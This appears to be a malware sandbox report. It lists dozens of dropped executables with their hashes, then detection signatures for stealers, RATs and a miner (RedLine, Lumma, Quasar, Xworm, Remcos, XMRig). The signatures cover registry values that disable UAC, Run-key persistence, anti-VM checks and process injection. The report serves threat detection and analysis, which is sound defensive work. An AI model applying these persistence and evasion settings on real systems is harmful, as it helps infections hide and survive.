| SHA512 | 60f4ebe4226fae95f6f1767d6f5fff99f69a126f0c827384c51745c512f495b001051d4273ca23bc177ec2c0511ec7f9ae384e3a5e88e29ce278ac45a55a39b8 |
C:\Users\Admin\AppData\Local\Temp\Files\putty.exe
| MD5 | 110f1d9cb98a072bbd1b432d2df0d5be |
| SHA1 | 5992a8ab7c9040ad79ead12a03ea626f397274d3 |
| SHA256 | 512e27ef54ccaca2dded62e43b7983bff7c29ef911ce504d099253ff03ef73da |
| SHA512 | d74084b93d02f470cfec038e9c77448d14e64f008624abbe413a82ee697693141c35370cf7ae6c348430b983cdc0b239757eaddf193b79905407264c11f73ecf |
C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe
| MD5 | 68397a2fd9688a7e8dd35b99811cbda1 |
| SHA1 | c53498e55b49cc46bc9e5768a102953f210c2627 |
| SHA256 | 8ad272f2df19694ec9102a5942bb62bc19984b690841d59af5947e2c4a0a9a07 |
| SHA512 | 2950b76134ec2edb40f6f05ef74adbacf5b08a6281e39dc31d8f2bc9602a4613ba71d23c2bc1e36a9e94413c6b6380e4b44113a5bad6c0a555b1bee8ba93013a |
C:\Users\Admin\AppData\Local\Temp\Files\hbfgjhhesfd.exe
| MD5 | 2b3a191ee1f6d3b21d03ee54aa40b604 |
| SHA1 | 8ecae557c2735105cc573d86820e81fcff0139c4 |
| SHA256 | f0d45f8340cd203ee98c7765267175576d8017df5166f425f8a7483cb35a91c8 |
| SHA512 | 31f621fd96bf2964529607ae64a173c4a99f3976a91283a3609edc3799d98f59de80da6266ca10c26e5c8733644f1764aab00c7ba3e4dc5456573b9b20b6a393 |
C:\Users\Admin\AppData\Local\Temp\Files\dujkgsf.exe
| MD5 | bc48cb98d8f2dacca97a2eb72f4275cb |
| SHA1 | cd3dd263fc37c8c7beb1393a654b400f2f531f1c |
| SHA256 | c18fb46afa17ad8578d1edd4aa6a89b42f381ca7998a4e5a096643e0f2721c49 |
| SHA512 | 7db6992278ca008e7aafa07eb198b046a125d23ca524f15d5302b137385dd4e40a4a54ce4dabb28710b71fbcfdd2d3315fb36e591edc2b3e1737b11b9ee45a5c |
C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe
| MD5 | 58e8b2eb19704c5a59350d4ff92e5ab6 |
| SHA1 | 171fc96dda05e7d275ec42840746258217d9caf0 |
| SHA256 | 07d4b7768e13d79ac5f05f81167b29bb6fbf97828a289d8d11eec38939846834 |
| SHA512 | e7655762c5f2d10ec246d11f82d437a2717ad05be847b5e0fd055e3241caaca85430f424055b343e3a44c90d76a0ba07a6913c2208f374f59b61f8aa4477889f |
C:\Users\Admin\AppData\Local\Temp\Files\ardara.exe
| MD5 | 30c6bf614292827bf72ab2a53dde9def |
| SHA1 | 057a43f119a380a846ee0df36e98bc848970e510 |
| SHA256 | f97b93920a4f3672e59a353cb83158a7fb1130e08939650370ef71d77b3959ae |
| SHA512 | 8a88cd53ff5fc39bb9a95912e5fc80c6be7b6c77d79599609edfc64ae67149ebef19a1674f77eba4369744290c392286fabb69f05a303e565a39455405175a4e |
C:\Users\Admin\AppData\Local\Temp\Files\Reaper%20cfx%20Spoofer%20V2.exe
| MD5 | 9bbac718d4436ff01b90e3b264a3025b |
| SHA1 | 8ad7da30141732c9c59092583cae2cafaba1eb35 |
| SHA256 | 32823127a44b07fb3472b287683a0f1679ae1d727363bbddb2787439e9f3f0ca |
| SHA512 | d04fa89ab964d9e6d2dcbbe93b323837bd7e37317d2594ad22696315118b49504faf582d3d0e01989163a6f7a7d1576a9e78356c6ec5a6c3e7094261f14e905a |
C:\Users\Admin\AppData\Local\Temp\Files\heo.exe
| MD5 | feaca07182c6be327551ba4402a338c7 |
| SHA1 | 5c699eb735def4473b9b02de282ccead84af1061 |
| SHA256 | 26e9813dd9d80e2b2441d799608214697d7262e24c739bcc11563756c22d3efc |
| SHA512 | 0ada77bc81af9b5d865f06cd6f91457281bdebbf07183367b7d3d0bd598ad7d3ce081b0d1f0741efbbe6c3839620bb17b637ff9727cb3440d5b96b3eab70dda1 |
C:\Users\Admin\AppData\Local\Temp\Files\Server.exe
| MD5 | a7a2022d715b3ecb85ea55de936f011b |
| SHA1 | 0200512447f2e95d1675b1833d008ea4a7ddaa94 |
| SHA256 | d5eaaa22cd69c6ddf1da7b0c8bd0cabbcda679810ed2d95839c08244235fbf81 |
| SHA512 | 7a0910ef562cb5936ab94fa94dce05eec2d6add7d6c3be3e8ad79a9710bc4fc283aec2d2f20dc6d4b0d641df5a8b1e368e6438f8e04c8f24a61b262d60ce5901 |
C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe
| MD5 | fb3217dd8cddb17b78a30cf4d09681fc |
| SHA1 | e4c4f4c1812927b176b58660d2edba75d103a76a |
| SHA256 | 12938790f91b2612b7c6a1fd4aa16219a7d2469731e27d4bbd409ad438e64669 |
| SHA512 | 4e37b8c6638c8c203fc2163be6014827a8c690506f50a8ec87022f7f5a74645f2c5bbcdfd7e0e75ec67775bc81887d6b094f08778c1f90c3909d46c8432344f4 |
C:\Users\Admin\AppData\Local\Temp\Files\HVNC1.exe
| MD5 | 2e1da3b03de67089bb9b8ffdf7e1c7a9 |
| SHA1 | 9dbd39eecf51da59be6190c47eda55f506eb2293 |
| SHA256 | 0b7846217c55d059c76ae8dfa0aec50305daef334b2bb72b63b64d76412bcae2 |
| SHA512 | 0a76cd8fca1207b5cc60e503470ecbc9656fcd48e0a87ae43953ba00fa2d912cec99a969364b5b53514f3b7260fdb059311660ec5caa1b0f03cb292c0ad5ee03 |
C:\Users\Admin\AppData\Local\Temp\Files\SrbijaSetupHokej.exe
| MD5 | 528b9a26fd19839aeba788171c568311 |
| SHA1 | 8276a9db275dccad133cc7d48cf0b8d97b91f1e2 |
| SHA256 | f84477a25b3fd48faf72484d4d9f86a4152b07baf5bc743656451fe36df2d482 |
| SHA512 | 255baefe30d50c9cd35654820f0aa59daccd324b631cc1b10a3d906b489f431bba71836bb0558a81df262b49fb893ca26e0029cca6e2c961f907aac2462da438 |
C:\Users\Admin\AppData\Local\Temp\Files\lega.exe
| MD5 | c057314993d2c4dce951d12ed6418af9 |
| SHA1 | ac355efd3d45f8fc81c008ea60161f9c6eac509c |
| SHA256 | 52c643d5cb8a0c15a26509355b7e7c9f2c3740a443774be0010928a1865a3bf1 |
| SHA512 | 893fc63947803bc665bcf369bf77ed3965d8fde636949e3c3e8f5bf3607112d044849991c4374c5efc8414fa0a4b7182b1e66e1aee8a22f73a13f6fa11511558 |
C:\Users\Admin\tbtnds.dat
| MD5 | e1c03c3b3d89ce0980ad536a43035195 |
| SHA1 | 34372b2bfe251ee880857d50c40378dc19db57a7 |
| SHA256 | d2f3a053063b8bb6f66cee3e222b610321fa4e1611fc2faf6129c64d504d7415 |
| SHA512 | 6ea0233df4a093655387dae11e935fb410e704e742dbcf085c403630e6b034671c5235af15c21dfbb614e2a409d412a74a0b4ef7386d0abfffa1990d0f611c70 |
C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe
| MD5 | f8b9bbe568f4f8d307effddb44d4c6b3 |
| SHA1 | 4bd7686eca3eeaffe79c4261aef9cebee422e8fd |
| SHA256 | 50104b13a245621a1a0291eac4f9eb9c010fae46cc511b936d6f3b42a398cab3 |
| SHA512 | 56c692e195771b02f9cf45786b233e2d996561360a5402577651a67c538c94a5f3e58925ba6e671515a8dd0dbcf1c0917b53d86d5ae6d2bc8dfd30ed5e60b9bf |
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe
| MD5 | 8eb5a3bca26acb6688a0cd7b35cfdad9 |
| SHA1 | 209c79d6b18a00f378efa75c7a3e44686f1850a1 |
| SHA256 | 24dfdf400d8514d3fbfc5f4aa5dd2143f38b160ad142417bbf83e4d2e425dd0c |
| SHA512 | 9dc20a43174f103ace495986cda9870ed4b899c74fe85cfd941fe2cc312e883caf9d0f8835fc59f8a7fd82ee350e479896fb31c7d0cd170ff6932fd9e24a0417 |
C:\Users\Admin\AppData\Local\Temp\Files\mimikatz.exe
| MD5 | 29efd64dd3c7fe1e2b022b7ad73a1ba5 |
| SHA1 | e3b6ea8c46fa831cec6f235a5cf48b38a4ae8d69 |
| SHA256 | 61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1 |
| SHA512 | f00b1ab035aa574c70f6b95b63f676fa75ff8f379f92e85ad5872c358a6bb1ed5417fdd226d421307a48653577ca42aba28103b3b2d7a5c572192d6e5f07e8b3 |
C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
| MD5 | f8c2769b1490e6eabeb8dd5faa8e6e70 |
| SHA1 | 6b2a22035f5a132302506ec6cad5f54882b059d4 |
| SHA256 | 2a3d500e6ad9c96fc55f57e8571d51ab639ca626997f348c0d21db23389a3df3 |
| SHA512 | 0deb225c581c8387f5ebd20636e679b398d57c0a7234383f83dc3edc9e4a08f396a2aee1af2382a8865f0632b81810be70b0bac5b290110d980a633a79a993e9 |
C:\Users\Admin\AppData\Local\Temp\Files\file.exe
| MD5 | 13095aaded59fb08db07ecf6bc2387ef |
| SHA1 | 13466ec6545a05da5d8ea49a8ec6c56c4f9aa648 |
| SHA256 | 02b4e1709e79653e9569bf727301f92d4928726ba69d8d764db5841b94d63671 |
| SHA512 | fe10e40072e12c68edd3c3fcb9583253a4ee9fd7ec42f2a423829202abedf443c654968acb44919ad8ba3ecafa77c95b7fd2b8b641dd83779960363c0bb11bf0 |
C:\Users\Admin\AppData\Local\Temp\Files\lummnew.exe
| MD5 | 9a4cc0d8e7007f7ef20ca585324e0739 |
| SHA1 | f3e5a2e477cac4bab85940a2158eed78f2d74441 |
| SHA256 | 040d121a3179f49cd3f33f4bc998bc8f78b7f560bfd93f279224d69e76a06e92 |
| SHA512 | 54636a48141804112f5b4f2fc70cb7c959a041e5743aeedb5184091b51daa1d1a03f0016e8299c0d56d924c6c8ae585e4fc864021081ffdf1e6f3eab11dd43b3 |
C:\Users\Admin\AppData\Local\Temp\Files\jy.exe
| MD5 | 21a8a7bf07bbe1928e5346324c530802 |
| SHA1 | d802d5cdd2ab7db6843c32a73e8b3b785594aada |
| SHA256 | dada298d188a98d90c74fbe8ea52b2824e41fbb341824c90078d33df32a25f3d |
| SHA512 | 1d05f474018fa7219c6a4235e087e8b72f2ed63f45ea28061a4ec63574e046f1e22508c017a0e8b69a393c4b70dfc789e6ddb0bf9aea5753fe83edc758d8a15f |
C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe
| MD5 | 2dcfbac83be168372e01d4bd4ec6010c |
| SHA1 | 5f0cf3f5be05b478dec3a55b7e1757ca7c1a7fd3 |
| SHA256 | 68fbb7d4c5af27b3941f4db758e2007decdd35849ab025a9e06d2ad4718b8b63 |
| SHA512 | a5acad6b7f97472367f59e85e8d61e7bbf25d6a1fc9054910780593440a2345d9ec8bb22a7f41b5b8f85eacbab9f8971dbe31c11c4c887647f86140f98e5a143 |
C:\Users\Admin\AppData\Local\Temp\Files\5447jsX.exe
| MD5 | 5dd9c1ffc4a95d8f1636ce53a5d99997 |
| SHA1 | 38ae8bf6a0891b56ef5ff0c1476d92cecae34b83 |
| SHA256 | d695267de534c2c99ec2823acc193fdbec9f398b0f78155ae2b982457ff631aa |
| SHA512 | 148d1b324391c4bb63b152a3c91a586b6821c4f5cde2a3f7afa56ad92074672619554fba3b2baca9802ff1ed9b42081574163304d450f7ccf664638599b23c2a |
C:\Users\Admin\AppData\Local\Temp\Files\basx.exe
| MD5 | eb66f0a9d7adaac4497dbe671b5a1280 |
| SHA1 | 5a741278c83955f4b9d749712e6642e13666c80b |
| SHA256 | 7e942cac82c7cfc6d91b56d00e4ad1d359b416200bf57c25206f49fbe07361c4 |
| SHA512 | c406b51f5ea8f12eb01172d794ba2b8d5cdb3fdff23a81a6a2706faea823e3c4716e8ab2ea25e7bbc1b79fe88c521cae8fdc196731d4cf002972c76d937a8cc4 |
C:\Users\Admin\AppData\Local\Temp\Files\krgawdtyjawd.exe
| MD5 | d4a8ad6479e437edc9771c114a1dc3ac |
| SHA1 | 6e6970fdcefd428dfe7fbd08c3923f69e21e7105 |
| SHA256 | a018a52ca34bf027ae3ef6b4121ec5d79853f84253e3fad161c36459f566ac2b |
| SHA512 | de181dc79ca4c52ce8de3abc767fbb8b4fd6904d278fa310eee4a66056161c0b9960ef7bebf2ebf6a9d19b653190895e5d1df92c314ca04af748351d6fb53e07 |
C:\Users\Admin\AppData\Local\Temp\Files\PHJG9876789000.exe
| MD5 | f7e373987d7d17a721a06558a6556dcc |
| SHA1 | 3a7cb4a0f3d8228198afe97c37c75db5c90ce036 |
| SHA256 | 6328f5ad5d16dbe08046450470e8ca083f07a10aa97401b0425a59d224492b13 |
| SHA512 | 4740fe6bec6fbd08ca3909651ed6ccc13b79e5e2f5ee8b5e1ed3492a90e6591710cd08869410d7f01ed939483046f7cd6ca0475c025afbc8f2171aa03c02c590 |
C:\Users\Admin\AppData\Local\Temp\Files\9402.tmp.exe
| MD5 | f1831e8f18625bb453d1bd5db5bd100d |
| SHA1 | 61d4770b0ea0ee3abb337a53ebce68a891ff01fd |
| SHA256 | 88f73b620d5c9e8cd51976e464208ac6cb4a13d19083187ad273ec6b5f33e6d1 |
| SHA512 | a2cce1122756098ad6bb11c3398bc9f04f63a83a92a7b619ba629b03ec314acc29197be22f7a5b5c8f003e58a563b065564530649c68b2cbeeecfe95db6564de |
C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe
| MD5 | 1248d4a486d79f6828c60b8385a1c2c6 |
| SHA1 | 62c5e5305a75c60c8295aed427d5cc284ee97f1b |
| SHA256 | addaf820ebd6d96728a5fb379579ee1536fb0993f6041d9ceef6e9e439c612a4 |
| SHA512 | 16bd84d597f601d6ab81204e8431a270dac9ed6331d95dc1944ba0a814b139d68431dabb3249d5e789218bce3c8a3379855f1a142686de109d23bcbb64e6adb5 |
C:\Users\Admin\AppData\Local\Temp\Files\chicken123.exe
| MD5 | adb486fe713afa6ebb7bd56291323d30 |
| SHA1 | ac0933eabcfc7991359240a8fa36b14f20a111a3 |
| SHA256 | b3b82b968621fc4ba2bd1be1dfe56ed7c4d71c52f08f2e00bdd05422e8db92ec |
| SHA512 | 6600bd572eb9999b06016422fdc74364ebb8bd7792be901324adcb19b3c9a0854998b46dad31861faf6e67e54e9e8f9b7624d452f208e2ee3f614101b636aec8 |
C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe
| MD5 | a4314ad7e9a2945cf99dd03e9e46f7c1 |
| SHA1 | 326c096e183a17cbc41034c6b6a6917de5347a86 |
| SHA256 | 22639054481629b24309f3ab18f016231ed4f3de6fa6b852598848c1dbe7cf1f |
| SHA512 | 5787f414ebf281f581e26d21541915897e741995528bb7cc20e5d7c02d8a35e05047cd47e231d3ea389986323ee58039844c075134869a3e63d004c11f08a8c8 |
C:\Users\Admin\AppData\Local\Temp\Tmp31CF.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
C:\Users\Admin\AppData\Local\Temp\Files\roblox1.exe
| MD5 | cd463d16cf57c3a9f5c9588a878a7213 |
| SHA1 | ef22c2b11efc0bc6a739b82f9a26edaee9348b8f |
| SHA256 | 49f4789274e5c0dcd4d2cc1b850761353bf8b72e819d12df5c376fd665da1283 |
| SHA512 | 5b20ce36b15f5d002d183850032067b11f811544bac19e0a76340df47294d0b059fa8dc43fedd8480d6f72eb8357d01924dbe9cbebdaac1625c5f4f498392822 |
C:\Users\Admin\AppData\Local\Temp\DownloadData.db
| MD5 | f310cf1ff562ae14449e0167a3e1fe46 |
| SHA1 | 85c58afa9049467031c6c2b17f5c12ca73bb2788 |
| SHA256 | e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855 |
| SHA512 | 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad |
C:\Users\Admin\AppData\Local\Temp\AutofillData.db
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\AutofillData.db
| MD5 | a1eeb9d95adbb08fa316226b55e4f278 |
| SHA1 | b36e8529ac3f2907750b4fea7037b147fe1061a6 |
| SHA256 | 2281f98b872ab5ad2d83a055f3802cbac4839f96584d27ea1fc3060428760ba7 |
| SHA512 | f26de5333cf4eaa19deb836db18a4303a8897bf88bf98bb78c6a6800badbaa7ab6aeb6444bbbe0e972a5332670bdbb474565da351f3b912449917be21af0afb8 |
C:\Users\Admin\AppData\Local\Temp\DownloadData.db
| MD5 | de727b32e4fcdf5233d266bd4137d248 |
| SHA1 | 09741704be6cfcdeb4ec64e111bb63c64376cb8a |
| SHA256 | 373a15ef7aed7ad668c98b88723866e194b3a4a4fa3e84eb540e324969afc5d0 |
| SHA512 | 21553f5222a3e3b025bc9412d31310e984670a781d22cb7fd3f1ec0dd78555d9de1eb22223c9b6523525181feeab74a0819f80c0b680d80628f2834dbb71cfad |
C:\Users\Admin\AppData\Local\Temp\Files\1111.exe
| MD5 | d2f4d9f256c7535760e18337e4076d9c |
| SHA1 | fb827863a28dfc01754cd9c277137578f358f6c6 |
| SHA256 | 6697bec4864bc595b26ed998bb6e2c7cf66184fbce450b808f5707a5213e71a2 |
| SHA512 | d60c9b9c2e6e9bc472ff35a7fc94c3e9a5455da5714c60cf4c7ef10f78091f50f909c8bf7d748b02f93624d64b77fc334dfba5b70d21140e5a6e5f99083a5a86 |
C:\Windows\Temp\rkjqngdetgcy.sys
| MD5 | 0c0195c48b6b8582fa6f6373032118da |
| SHA1 | d25340ae8e92a6d29f599fef426a2bc1b5217299 |
| SHA256 | 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 |
| SHA512 | ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d |
C:\Users\Admin\AppData\Local\Temp\Files\dccrypt.exe
| MD5 | 55398a65a9d1abb512e943a0d8901cb0 |
| SHA1 | 9dfa573fad30f5010bc91cdf0752461aacaf36cf |
| SHA256 | e91ebc7e19b4dec3ce6f2aaf4ee8fb9fb24cba265088781f9845d8a32d1f2948 |
| SHA512 | 5cc41e3b79e35597f288737a7f65c035c56524c94d98dcb9892d656d92a6652a9f3b42a96b09d3fb10bd6e3c84fbe326efc64e252c0bc62d19ee6e80f1fdd556 |
C:\Users\Admin\AppData\Local\Temp\Files\Z9Pp9pM.exe
| MD5 | 2a78ce9f3872f5e591d643459cabe476 |
| SHA1 | 9ac947dfc71a868bc9c2eb2bd78dfb433067682e |
| SHA256 | 21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae |
| SHA512 | 03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9 |
C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe
| MD5 | a474faa2f1046fbab4c3ad1e3a26097e |
| SHA1 | aa526b2583dd9b72dd4ae2549189c6631f8486c2 |
| SHA256 | 391233a33e1e163875616a8c1564ec8597b630ffcbb4b123c5cfb5b5d3eeea8b |
| SHA512 | 947f248d1e7c7c897a9b508607611bb69fa3a9ac1d8b5a0e0343e955a7d6dd235408d086bdf2ec4e9f15e30c1f082b9980144f6de7eebf95e71719c5e1e7040b |
C:\Users\Admin\AppData\Local\Temp\Files\FACT0987789000900.exe
| MD5 | e4da22458c317595e4bd6712b4728d36 |
| SHA1 | 111a5c4cbd45bced7c04cbeb5192a9afe178865c |
| SHA256 | f3530f9d52d1ba3ed70cc5d603cf0a83771027cda5fd545206e1688589ef69fd |
| SHA512 | b19d9eb5e06834538e8ca5e8655e360b56d63c8ad67441607279c18a848d46a6095b6cbe7019fc79eba784392278e30134e7aef149d0e12964d0b86ecd08dc1d |
C:\Users\Admin\AppData\Local\Temp\Files\GIFT-INFO.lMG.exe
| MD5 | e6a13f9bc436e5044cf60bec98de08ce |
| SHA1 | 0431ccb9dc9a11fd5cdf7d4c6d06690fa63a06c4 |
| SHA256 | 9f226243336a6c2150017ca7faa116f9bcb7cb694acc470e3fa1e2cfedba5d8e |
| SHA512 | 42ffb0c7921d0b11adef6a8629182fdee50063cdbb01b24b7cfcf7d9f8b656a4b3acbdfa2d8746dc19314437cec5f196cd15f839d003423baf17012f41e9df48 |
C:\Users\Admin\AppData\Local\Temp\Files\hell9o.exe
| MD5 | 2e933118fecbaf64bbd76514c47a2164 |
| SHA1 | a70a1673c4c7d0c0c12bc42bc676a1e9a09edc21 |
| SHA256 | 5268359ebc3f9e709c8eee1fa9d3e7c579b3e4563fabb9c394abe0fe2e39137f |
| SHA512 | c34672e55625462d16051cd725c96d634e459d61a9552f858f0b234d5eedf67594ca336f4fd695e3046c4e0485d4fa4497b6c604ee4144c49a6c1c0838628bdb |
C:\Users\Admin\AppData\Local\Temp\Files\rj2wofc38q.exe
| MD5 | b0a2fac3b425dd691d1b69df89669375 |
| SHA1 | f824a1537c1a921abf4b9968af284d772befcf29 |
| SHA256 | 96ac93e104cbaad3e209ed6728963a16270addd436eb651afd59030343994080 |
| SHA512 | 89312ba8daa00e64be81f9a98585b80fac906a42b367f9e4ab4c025676a635f17852b59b615149006cefbf95d147f53c956cb28fee5d5bd7f0984da7dd35e04a |
C:\Users\Admin\AppData\Local\Temp\_MEI49322\Crypto\Hash\_SHA224.pyd
| MD5 | 2f2655a7bbfe08d43013edda27e77904 |
| SHA1 | 33d51b6c423e094be3e34e5621e175329a0c0914 |
| SHA256 | c734abbd95ec120cb315c43021c0e1eb1bf2295af9f1c24587334c3fce4a5be1 |
| SHA512 | 8af99acc969b0e560022f75a0cdcaa85d0bdeadadeacd59dd0c4500f94a5843ea0d4107789c1a613181b1f4e5252134a485ef6b1d9d83cdb5676c5fee4d49b90 |
C:\Users\Admin\AppData\Local\Temp\_MEI49322\certifi\cacert.pem
| MD5 | 50ea156b773e8803f6c1fe712f746cba |
| SHA1 | 2c68212e96605210eddf740291862bdf59398aef |
| SHA256 | 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47 |
| SHA512 | 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0 |
C:\Users\Admin\AppData\Local\Temp\Files\svchosts.exe
| MD5 | ab3f75f41982ca216badc3e56f9d3e88 |
| SHA1 | ee26477ee9d90af2e940e6f99617e7d54b241635 |
| SHA256 | e47e8c01326ac9c785f3edcd04fb360333a5904854c69d464f8321a27f5d0c08 |
| SHA512 | 6325f73f6d82424aaa64132fb37b0c7713fc53faa304da8d63a71c757cfd4dcdccac925650bf763188d913c9562e37f2a500ad7bb80d7b9f6aa456c43bfe8822 |
C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe
| MD5 | dc860de2a24ea3e15c496582af59b9cb |
| SHA1 | 10b23badfb0b31fdeabd8df757a905e394201ec3 |
| SHA256 | 9211154f8bd85ce85c52cfe91538e6ba2a25704b6efb84c64460ba4da20fa1a9 |
| SHA512 | 132dad93963cd019fa8fc012f4c780d2ab557e9053afe3f7d4334e247deb77c07bb01c8c5f9c05e9c721d3fe8e6ec29af83b7bb7bf1ad925fae7695ed5cfc3db |
C:\Users\Admin\AppData\Local\Temp\Files\RMS1.exe
| MD5 | 03b1ed4c105e5f473357dad1df17cf98 |
| SHA1 | faf5046ff19eafd3a59dcf85be30496f90b5b6b1 |
| SHA256 | 6be5916900ffda93154db8c2c5dd28b9150f4c3aef74dbd4fd86390bc72845ba |
| SHA512 | 3f6f8a12d000b913dc8240542be6a64f991dc0802313782d038b971219308e7d381d4d96c25d98ee1b05bca127a9bbc69e3bd54f1722d8381f8060bb506a9765 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-12 18:02
Reported
2024-12-12 18:07
Platform
win10v2004-20241007-en
Max time kernel
154s
Max time network
301s
Command Line
Signatures
44Caliber
44Caliber family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Stealc
Stealc family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 6548 created 1060 | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3244 created 3588 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | C:\Windows\Explorer.EXE |
| PID 5956 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2300 created 3588 | N/A | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | C:\Windows\Explorer.EXE |
| PID 452 created 1060 | N/A | C:\Windows\System32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
